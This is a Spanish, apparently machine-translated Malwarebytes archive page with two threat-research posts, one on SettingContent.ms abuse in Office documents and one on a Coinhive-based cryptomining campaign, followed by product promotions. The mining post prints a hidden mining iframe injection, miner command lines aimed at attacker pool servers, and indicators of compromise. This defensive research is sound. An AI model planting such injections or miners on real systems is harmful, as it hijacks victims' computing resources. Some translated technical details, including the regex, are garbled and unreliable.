Archivos de autor malwarebytes

Pormalwarebytes

Nueva técnica sin macros para distribuir malware

Publicado: 2 de julio de 2018 por 
Última actualización: 3 de julio de 2018

Uno de los vectores de infección más comunes y efectivos, especialmente para empresas, es el uso de documentos maliciosos de Office. Solo este año, fuimos testigos de dos días cero para Flash y el motor de VBScript , que primero se incorporaron a los documentos de Office antes de obtener una adopción más amplia en los kits de exploits web.

Además de aprovechar vulnerabilidades de software, los atacantes abusan regularmente de las características normales de Office, como macros, o de otras más oscuras como  Dynamic Data Exchange (DDE) y, por supuesto, ataques de enlace e incrustación de objetos (OLE), que también pueden combinarse con exploits . Los administradores del sistema pueden endurecer los puntos finales mediante la desactivación de ciertas funciones en toda la empresa, por ejemplo, para frustrar ciertos esquemas de ingeniería social que intentan engañar a los usuarios para que habiliten una macro maliciosa. En versiones recientes de Office , Microsoft también está bloqueando la activación de objetos considerados de alto riesgo, según una lista de extensiones que se pueden personalizar a través de la Política de grupo.

Pero un descubrimiento reciente del investigador de seguridad Matt Nelson , muestra que se puede aprovechar otro vector de infección, uno que elude la configuración de protección actual e incluso la nueva  tecnología de Reducción de Superficie de Ataque de Microsoft  . Al incrustar un archivo de configuración especialmente diseñado en un documento de Office, un atacante puede engañar a un usuario para que ejecute código malicioso sin más advertencias o notificaciones.

El formato de archivo, específico para Windows 10 llamado .SettingContent.ms , es esencialmente código XML que se utiliza para crear accesos directos al Panel de control. Esta característica se puede abusar porque uno de sus elementos (DeepLink) permite ejecutar cualquier binario con parámetros. Todo lo que un atacante debe hacer es agregar su propio comando usando Powershell.exe o Cmd.exe. Y el resto es historia.

Un nuevo script encontrado por Nick Carr muestra un ataque en el que se invoca PowerShell para descargar y ejecutar REMCOS RAT ( informe VT ). Según Matt Nelson , quien descubrió esta nueva técnica, Microsoft no va a solucionarlo, al menos por el momento.

Probamos esta muestra en nuestro laboratorio y nos complace informar que los usuarios de Malwarebytes ya están protegidos:

Durante los últimos años, aunque ha habido poco desarrollo con kits de exploits web , ha habido mucha actividad con kits de explotación de documentos como Microsoft Word Intruder (MWI) o Threadkit . Estos kits de herramientas permiten a los atacantes crear señuelos e incrustar los exploits de su elección antes de lanzar phishing a sus víctimas o enviar el archivo a través de campañas de spam más grandes. Al mismo tiempo, parece que los ataques clásicos de ingeniería social no van a ir a ningún lado pronto y seguirán aprovechando el elemento humano.

Es importante que los usuarios finales y las empresas reconozcan que los documentos son un vector ideal de entrega de malware y requieren una protección y capacitación adecuadas para luchar contra ellos.

Pormalwarebytes

El enlace corto de Coinhive revela una operación minera más grande

Publicado: 3 de julio de 2018 por 
Última actualización: 2 de julio de 2018

Durante los últimos meses, la minería en el navegador ha seguido afectando a una gran cantidad de sitios web, y se basa predominantemente en la infame API de Coinhive. Documentamos varias campañas en este blog, en particular Drupalgeddon , donde los atacantes aprovechan las vulnerabilidades de los sistemas de administración de contenido (CMS) populares para comprometer sitios web y enviar cargas útiles tanto del lado del cliente como del servidor.

En las últimas semanas, nuestros rastreadores han catalogado varios cientos de sitios utilizando una variedad de CMS, todos ellos inyectados con el mismo código ofuscado que utiliza el enlace corto de Coinhive para realizar silenciosas unidades de disco duro . Al pivotar sobre este indicador de compromiso, pudimos identificar una infraestructura más grande que recibe tráfico de varios miles de sitios pirateados que actúan como puertas de entrada para redirigir el tráfico a un servidor central involucrado en la distribución de mineros de moneda estándar y web.

Figura 1: Operación minera impulsada por sitios comprometidos

Injerto de minero ofuscado

Como parte de nuestros rastreos regulares, buscamos redireccionamientos conocidos a sitios de interés y, últimamente, la mayoría se han relacionado con dominios de Coinhive. Detectamos cientos de dominios nuevos, todos los sitios web legítimos a los que se les inyectó una publicidad de código hexadecimal. Una vez decodificado, se muestra como un iframe invisible (1 × 1 píxel) a cnhv [.] Co / 3h2b2 . Creemos que es parte de la misma campaña que fue expuesta por la gente de Sucuri a fines de mayo.

<i frame src = "https: // cnhv [.] co / 3h2b2" width = "1" height = "1" align = "left"> </ i frame>

Figura 2: un sitio de WordPress inyectado con un iframe ofuscado que carga la API de Coinhive

El CNHV [.] Nombre de dominio co se utiliza para lo que llama Coinhive shortlinks , esencialmente, una forma de monetizar en hipervínculos haciendo navegadores de los visitantes a resolver un cierto número de valores hash antes de que lleguen a su sitio de destino. Al hacer clic en dicho enlace, verá una barra de progreso y en unos segundos, será redirigido. Los delincuentes están abusando de esta característica al cargar esos enlaces cortos como iframes ocultos con un recuento de hash irracionalmente alto.

Figura 3: Shortlink está gravando nuestra CPU al 100% 

En la Figura 3, donde hicimos visible el iframe cambiando sus dimensiones, para mostrar que, en lugar de esperar unos segundos antes de ser redirigido, los usuarios sin saberlo estarán explotando mientras permanezcan en la página. De hecho, aunque la configuración predeterminada de Coinhive está configurada en 1024 hashes, esta requiere 3,712,000 antes de cargar la URL de destino.

Backdoor inició la redirección

Al consultar urlscan.io , pudimos encontrar la misma clave de Coinhive activa el 7 de mayo a  través de un mecanismo de redirección diferente. Hay un patrón de URI específico que indica que los sitios pirateados se están aprovechando para realizar una redirección a un servidor a las 5.45.79 [.] 15 . Esto, a su vez, crea una redirección a través de otro URI diseñado donde uno de los parámetros es el sitio de referencia, que finalmente conduce al enlace corto de Coinhive que iniciará el minero web.

Figura 4: Se encontró el mismo enlace corto cargado desde un sitio web comprometido a través de un servidor intermediario

Varios sitios han sido inyectados con tanto la cnvh oculto método de co iframe, así como a través de puertas traseras [.]:

Figura 5: un sitio pirateado inyectado con el enlace corto de Coinhive y varias URL comprometidas

El patrón URI utilizado para las redirecciones se puede identificar mediante la siguiente expresión regular:

Figura 6: una expresión regular que muestra una coincidencia entre sitios comprometidos

Blackhat SEO y puertas

Si observamos nuevamente esos URI, podemos observar la presencia de ciertas palabras clave que parecen estar relacionadas con la Optimización de motores de búsqueda (SEO), por ejemplo:

cctvvietnam [.] com / 1hqg / wzdea.php? lrscye = mongodb - count - fields 
pixelbedlam.co [.] uk / 9ul8 / 6nfme.php? lrscye = relatividad - software - costo 
valam [.] in / f8wb / z8d6w. php? lrscye = tutoría - en - egipto 
stemat [.] pl / klwy / dzwfy.php? lrscye = vin - decodificador - mercedes 
whylab [.] nl / podd / 1hwnz.php? lrscye = gpon - inicio - puerta de enlace - explotar 
soho -dom [.] ru / el5p / ywuul.php? lrscye = bts - album - descargar -cremallera

Confirmamos que, de hecho, algunas búsquedas de Google o Bing nos mostraron resultados que incluían la lista de sitios comprometidos que actúan como «puertas», generalmente a un sistema de distribución de tráfico o redirector (5.45.79 [.] 15). En este caso, las entradas se utilizan para engañar a las personas para que descarguen mineros de moneda malintencionados en lugar del archivo que estaban buscando.

Figura 7: a pesar de las apariencias, este archivo no está 100% limpio

Observe cómo el servidor en 5.45.79 [.] 15 está realizando la redirección a otro sitio pirateado ( motoir [.] Com ), donde las palabras clave pasadas del URI se usan dinámicamente para crear lo que parece una única página y archivo de descarga.

Figura 8: Tráfico web que muestra la secuencia de redirección

Mineros de monedas malvados

Tras la ejecución, este ejecutable descomprimirá los siguientes tres binarios:

  1. winsystem.exe : el minero de XMRig
  2. clock.exe : archivo .bat envuelto en un EXE contiene comandos
  3. netflash.exe : un descargador muy simple, escrito en .NET.

La secuencia de comandos por lotes agrega persistencia al establecer una entrada de registro, elimina ciertos procesos (posibles mineros que ya se están ejecutando) y comienza a minar al iniciar:

winsystem.exe -B -a cryptonight -o 37.1.197 [.] 121: 80 -px -u% COMPUTERNAME% +500 --max-cpu-use = 30 --donate-level = 1 -k

Figura 9: script por lotes que revela el código de minería

Los binarios de descarga falsos se basan en el mismo código de un minero, como era de esperar, alojado en 5.45.79 [.] 15 / xxxphoto.exe . Utilizando VirusTotal Intelligence, pudimos ampliar esta infraestructura e identificar otro coin miner, que es un archivo ELF esta vez, basado en esta biblioteca cnrig , alojado en: 5.45.79 [.] 15 / monero / cnrig .

Figura 10: Gráfico que muestra un minero ELF y Win32 alojado en el mismo servidor

Un comentario dejado en esta  página del informe VirusTotal indica que este minero fue encontrado en un servidor infectado y sacado de una puerta trasera PHP llamada  zz1.php . Buscando ese nombre de archivo, ubicamos un posible candidato cargado en un sitio público. Decodificando las cadenas codificadas en Base64, podemos afirmar con mayor confianza que este es el archivo PHP malicioso utilizado por los atacantes para descargar el minador de monedas de Linux desde  5.45.79 [.] 15 / monero / cnrig :

Figura 11: código PHP cargado en sitios comprometidos responsables de la descarga de mineros de ELF

Una vez que ha recuperado el binario ELF, lo ejecuta usando el siguiente comando para comenzar a extraer:

./cnrig -o 5.61.46 [.] 146: 80 - nivel de donación = 1> / dev / null 2> & 1

Proxies

Debido a que los mineros se están conectando a grupos privados (y probablemente a través de un proxy) sin utilizar una dirección de billetera, no podemos evaluar cuánto dinero han generado los perpetradores con este esquema.

De hecho, el servidor en 5.45.79 [.] 15 también tiene su propio ProxyPanel :

Figura 12: un proxy basado en  xmrig-proxy

La versión de XMRig del minero tenía una página pública de estadísticas que indicaba que había cerca de 500 máquinas infectadas que habían participado en la actividad minera. Para la versión CNRig, no pudimos encontrar ninguna estadística, aunque la cantidad de servidores pirateados fue mucho mayor.

Un número creciente de sitios

El interés que rodea a las criptomonedas ha cambiado drásticamente el panorama de malware con los delincuentes con la esperanza de obtener una parte de la acción. Como tal, cada vez más sitios web se ven comprometidos tanto en el lado del cliente como en el del servidor para distribuir y ejecutar mineros.

En esta campaña, vemos una infraestructura utilizada para impulsar a un minero de XMRig a los usuarios engañándolos para que descarguen los archivos que estaban buscando en línea. Mientras tanto, los servidores pirateados tienen instrucciones de descargar y ejecutar un minero Linux, generando ganancias para los perpetradores pero incurriendo en costos para sus propietarios. Finalmente, parece apropiado ver un abuso de los enlaces cortos de Coinhive para realizar minería en el navegador.

Malwarebytes bloquea la extracción maliciosa, ya sea desencadenada por malware o cargada a través de sitios web comprometidos.

Gracias a @DynamicAnalysis por compartir información adicional.

Indicadores de compromiso

Cadena para la inyección de cnvh [.] Co ofuscado

vhisduhvuhiusdhfbjhewvhisdhbybguyebrrfsd

Coinhive shortlink

cnhv [.] co / 3h2b2

Clave del sitio de Coinhive

Dkpy5v4CBgwZqzPRosdHKDB7DQsc1Sav

Regex para la redirección de sitios comprometidos

\ / (\ w {4} | \ w {8}) \ / (\ w {5} | \ w {9}) \. php \? ([az] {6} | [az] {3}) = [\ w] {1,25} - [\ w] {1,25}

Servidor de redirección

5.45.79 [.] 15

Cuentagotas de minero de Windows

5.45.79 [.] 15 / xxxphoto.exe
38f55239519523638dc2b3958f5e9951a6b04f813336927a4f7de717518e5b44

Minero de Linux

5.45.79 [.] 15 / monero / cnrig
c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031
Pormalwarebytes

SOLICITAR VERSION DE EVALUACION DE MALWAREBYTES ENDPOINT PROTECTION

Pormalwarebytes

Malwarebytes RegASSASSIN

Elimina las claves de registro creadas por malware

DESCARGAR

RegASSASSIN puede eliminar cualquier clave o valor del registro de su ordenador

En muchos casos, el malware deposita claves de registro parasitarias en el registro del sistema, lo que pone su ordenador en riesgo de infección y corrupción. Estas claves eran muy difíciles de eliminar… hasta hoy.

RegASSASSIN elimina las claves del registro creadas por el malware en dos sencillos pasos: basta con restablecer los permisos y eliminar la clave. Esta aplicación potente y portátil le hará olvidar a las claves del registro difíciles de eliminar.

Aviso: Extreme la precaución, ya que el borrado de claves críticas del registro puede causar errores del sistema.

Uso

  • Descargue RegASSASSIN del enlace anterior.
  • Haga doble clic en RegASSASSIN.exe
  • Introduzca la clave del registro que desee eliminar o restablecer y haga clic en Borrar
Pormalwarebytes

Malwarebytes ThreathDown MDR

Detección y respuesta gestionadas (MDR)

ThreatDown Managed Detection and Response proporciona
servicios de detección y remediación de amenazas potentes y asequibles con
monitoreo e investigaciones las 24 horas, los 7 días de la semana, diseñados específicamente para equipos de TI con recursos limitados.

Cambiando el juego con MDR

La falta de ancho de banda y de habilidades puede limitar la capacidad de su equipo para monitorear y reaccionar de manera efectiva ante las alertas de amenazas. Los analistas de ThreatDown MDR llenan estos vacíos las 24 horas, los 7 días de la semana y se convierten en una extensión de su equipo.

Los ciberataques interminables inundan continuamente a las organizaciones con alertas de amenazas. ThreatDown MDR monitorea y clasifica las amenazas en su nombre, liberando a su equipo.

Detección y remediación de amenazas potente y asequible

Monitoreo de alertas 24×7 y orientación para MSP  para ayudar a eliminar amenazas utilizando el poder de la remediación ThreatDown EDR

Búsqueda de amenazas en los sitios de los clientes , lo que ayuda a evitar que las amenazas ocultas se conviertan en infecciones activas.

Pormalwarebytes

Malwarebytes StartUpLITE

StartUpLITE acelera el arranque de Windows

DESCARGAR

A nadie le gusta esperar a que su equipo arranque: es tan aburrido como sentarse a mirar la pared (o un partido de golf). En Malwarebytes sabemos que tiene otras cosas que hacer y sitios web que visitar, así que hemos creado una forma ligera y manejable de acelerar el arranque.

StartUpLITE ofrece una manera segura, fácil y eficaz de eliminar aquellas aplicaciones innecesarias que se inician al encender el ordenador.

Desactivando o eliminando las entradas innecesarias, StartUpLITE puede reducir enormemente el tiempo de inicio con solo unos clics del ratón. Deje de esperar y empiece a disfrutar del ordenador.

Uso

  • Solo tiene que descargar StartUpLITE desde el enlace que aparece arriba y guardarlo en una ubicación adecuada
  • Haga doble clic en StartUpLITE.exe
  • Seleccione aquellas opciones que desea ejecutar y seleccione Continuar
Pormalwarebytes

Malwarebytes ThreathDown DNS Filtering

Filtrado DNS

Bloquee el acceso a dominios web sospechosos conocidos para garantizar la productividad y la colaboración.

Ofrezca fácilmente un acceso web más seguro y productivo

Las amenazas provienen de muchas fuentes y los clientes de ThreatDown confían en nosotros para prevenir infecciones a través de vectores. Nuestro módulo de filtrado DNS amplía nuestra plataforma de seguridad basada en la nube, bloqueando sitios que introducen riesgos e impiden la productividad para que pueda proteger mejor a los usuarios finales y sus aplicaciones basadas en web.

Evite que las amenazas se infiltren en navegadores y aplicaciones basadas en web

Con nuestro módulo de filtrado DNS, puede bloquear categorías completas de sitios web, como juegos de apuestas, contenido para adultos, etc. Obtenga acceso a una extensa base de datos de puntuaciones predefinidas en dominios web conocidos y sospechosos y administre restricciones de sitios específicos. Más allá de la navegación, puede proteger mejor las aplicaciones basadas en web que ejecutan sus operaciones, manteniendo a sus usuarios finales seguros y productivos.

Pormalwarebytes

Malwarebytes ThreatDown Gestion de Vulnerabilidades

Gestión de vulnerabilidades y parches

Comprenda los riesgos rápidamente y fortalezca las defensas en todo su ecosistema digital con módulos para nuestra plataforma de gestión de seguridad basada en la nube.

Obtenga una imagen más completa del riesgo en un solo lugar

Los usuarios de ciberprotección de ThreatDown ya reconocen el valor de poder detectar amenazas y remediar completamente las infecciones. Hemos ampliado la visibilidad de las vulnerabilidades del software para que pueda tomar medidas adicionales para fortalecer sus defensas.

Obtenga ayuda con la prevención proactiva

No es de extrañar que la mejor manera de evitar un incidente de seguridad sea, en primer lugar, bloquear la entrada de amenazas.

Nuestro  módulo de gestión de parches  facilita la acción rápida durante el proceso de aplicación de parches, 

Nuestro nuevo  módulo de Evaluación de Vulnerabilidad  ayuda a los suscriptores de Endpoint Protection y Endpoint Detección y Respuesta a comprender la exposición, identificar vulnerabilidades y priorizar acciones. Esto ayuda a garantizar que las defensas estén actualizadas en todos los sistemas operativos de dispositivos y servidores, y en una amplia gama de aplicaciones de terceros.

Pormalwarebytes

Malwarebytes ThreatDown Application Block

Bloqueo de aplicaciones Malwarebytes ThreatDown

Evite que los ciberdelincuentes inicien ataques a través de aplicaciones en riesgo en máquinas con Windows.

Detenga las amenazas basadas en aplicaciones antes de que sucedan

Los actores de amenazas pueden incrustar código malicioso en aplicaciones aparentemente legítimas, que los usuarios finales luego ejecutan inocentemente en sus puntos finales (y tan simple como eso, los malos están dentro). Nuestro módulo de Bloqueo de Aplicaciones amplía nuestra plataforma de seguridad basada en la nube, bloqueando aplicaciones que puedan ser bienvenidas. riesgo o disminuir la productividad para poder proteger mejor a los usuarios finales.

¿Por qué bloquear aplicaciones con Malwarebytes ThreatDown?

Incrementar la ciberseguridad (mientras minimiza su complejidad de gestión) reduciendo la amenaza de ciberataques a través de aplicaciones en riesgo, un principal vector de ataque. 
Aplicaciones seguras con Bloqueo de aplicaciones. Las aplicaciones que han sido incluidas en la lista negra no pueden ejecutarse (ni iniciarse) en los puntos finales, lo que reduce significativamente las probabilidades de que los ciberdelincuentes exploten esas aplicaciones bloqueadas y las utilicen para introducir malware.

Reduzca el riesgo de incurrir en multas (o enfrentar cargos penales) por no cumplir con las regulaciones de protección de datos como GDPR, CIPA o HIPAA. Application Block le brinda la capacidad de registrar la actividad de bloqueo de aplicaciones. 
Con Application Block, puede ver y guardar informes que pueden usarse para confirmar el cumplimiento de las regulaciones de datos, satisfacer las expectativas de gobernanza o cumplir con los requisitos de seguro cibernético.

Pormalwarebytes

Malwarebytes ThreatDown Managed Threat Hunting

Identifique intrusos ocultos antes de que ataquen

Managed Threat Hunting (MTH) es un servicio 24 horas al día, 7 días a la semana que identifica de forma proactiva y luego alerta a los clientes sobre amenazas potenciales antes de que comience un ataque activo. Utilizando inteligencia de amenazas, MTH busca eventos e indicadores de preocupación o compromisos (IOC) que están ocultos, pasados ​​por alto o que antes se desconocían.

Nunca te pierdas otra amenaza

La caza de amenazas gestionada (MTH) es esencial para detener las intrusiones que evaden la remediación y causan el mayor daño.

Cuando una búsqueda de amenazas da como resultado un hallazgo positivo, se notifica al cliente y se le envía orientación específica del COI con su investigación y solución.

Integrado con EDR

MTH está diseñado específicamente para clientes de ThreatDown EDR (Detección y respuesta de endpoints) y MSP (proveedores de servicios gestionados).

Notificaciones guiadas

Los clientes reciben notificaciones guiadas, basadas en la gravedad de la amenaza y el tipo de IOC, para ayudar con su investigación y remediación.